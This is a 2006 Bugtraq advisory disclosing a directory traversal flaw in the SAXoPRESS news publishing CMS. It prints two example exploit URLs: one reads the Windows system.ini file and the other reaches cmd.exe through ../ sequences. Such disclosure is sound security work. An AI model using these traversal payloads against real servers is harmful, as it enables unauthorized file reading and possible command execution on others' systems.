Bugtraq mailing list archives
SAXoPRESS - directory traversal
From: securiteam () datasec no
Date: 11 Apr 2006 15:37:16 -0000
SAXoPRESS is a content management system, mainly used for news publishing. A vulnerability exists in SAXoPRESS, which allows malicious users to read the contents of files on the server, and possibly execute arbitrary commands. Example exploit: http://example.com/apps/pbcs.dll/misc?url=../../../../../../../../../../winnt/system.ini http://example.com/apps/pbcs.dll/misc?url=../../../../../../../../../../winnt/system32/cmd.exe Affected versions: unconfirmed
Current thread:
- SAXoPRESS - directory traversal securiteam (Apr 11)